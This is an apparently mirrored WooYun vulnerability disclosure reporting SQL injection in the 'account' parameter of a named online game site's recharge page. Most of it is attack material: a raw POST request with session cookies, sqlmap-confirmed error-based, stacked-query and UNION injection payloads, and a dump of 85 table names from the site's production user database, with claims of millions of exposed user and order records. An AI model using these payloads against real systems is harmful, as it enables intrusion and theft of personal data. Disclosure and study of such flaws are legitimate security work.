乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-19: 细节已通知厂商并且等待厂商处理中 2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开
POST /recharge/alipay_recharge.asp HTTP/1.1Content-Length: 252Content-Type: application/x-www-form-urlencodedCookie: ASPSESSIONIDCSTTDCDB=KLFDBCBAJGFLMKFJLJJMCKNL; ASP.NET_SessionId=514hzo55fo1wrz55ipgybo55; Hm_lvt_d5924889d984deffd476e1699e74ce59=1447669732,1447669829,1447669830,1447669852; Hm_lpvt_d5924889d984deffd476e1699e74ce59=1447669852; CNZZDATA4818108=cnzz_eid%3D899435885-1447669577-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447669577; bdshare_firstime=1447669578206; HMACCOUNT=23FE2290393AAD15; BAIDUID=B65CAF626516BDEBC3DF19CD8CC25F5B:FG=1Host: www.91zjd.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111&againaccount=4111111111111111&DropDownList1=1&txtyzm=1
sqlmap resumed the following injection point(s) from stored session:---Parameter: account (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111' AND 7184=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7184=7184) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'yPCg'='yPCg&againaccount=4111111111111111&DropDownList1=1&txtyzm=1 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111';WAITFOR DELAY '0:0:5'--&againaccount=4111111111111111&DropDownList1=1&txtyzm=1 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=-8992' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(73)+CHAR(68)+CHAR(112)+CHAR(107)+CHAR(88)+CHAR(98)+CHAR(117)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(98)+CHAR(113)-- &againaccount=4111111111111111&DropDownList1=1&txtyzm=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008Database: QPGameUserDB[85 tables]+------------------------------+| 168logo_ForTG || 168logo_ForTeam || 168logo_ForTeam || AccountsInfo0821 || AccountsInfo1121 || AccountsInfo_20131010 || AccountsInfo_20131010 || AccountsInfo_emailbak || AccountsInfo_emailbak || AccountsInfo_regtj || AccountsInfo_temp1 || AccountsInfo_temp1 || AccountsInfo_xt || AccountsInfobak || ConfineAddress || ConfineContent || ConfineMachine || CustomTable || D99_CMD || D99_REG || D99_Tmp || DIY_TEMPCOMMAND_TABLE || DailyLogonPrize || GameIdentifier || GameUserBang_New_tyb || GameUserBang_TYBLogo || GameUserBang_TYB_WEEKLY_view || GameUserBang_TYB_WEEKLY_view || GameUserBang_abest_view || GameUserBang_abest_view || GoldEggsLog20110 || GoldEggsLog20110 || GoldEggsLog20110 || GoldEggsLog2012 || IndividualDatumFirend || IndividualDatumbak || IndividualDatumbak || LuckUser || PK_GameDownloadCount || PK_RegSourceIp || PK_SOURCE_IP_POOL || PK_WebPage_Click_Count || QPGameUserDB || QQcdkey || Rechargeable_Card_TEST || Rechargeable_Card_TEST || Reg_Arrt || S3_Tmp || ShortUrlLink || SystemStatusInfo || SystemStreamInfo || UserAddScoreLogo || UserMemberOrder || UserWincountlogo || VW_Charge_List || View_AccountsInfo_regtjNew || View_AccountsInfo_regtjNew || View_CZK_TG || View_Rechargeable_Card_tg || View_TYB_USERBANG || View_UserALLLogo_bySpid || View_UserALLLogo_bySpid || View_UserFristLogo || View_UserLogoNew || View_UserLogoNew || View_Userinfo_ME || View_VWUserFristLogo || View_t1 || View_t310 || View_t320 || View_t500 || Yjt_accounts || accountsinfo20110101 || comd_list || dxUserbak || dxuserall || dxuserall || dxuserlist || iphonetemp1 || iphonetemp1 || iphonetemp2 || sqlmapoutput || tempUsername || tempcity || we |+------------------------------+
222万用户信息:
千万订单信息:
危害等级:无影响厂商忽略
忽略时间:2015-11-25 09:00
漏洞Rank:15 (WooYun评价)
暂无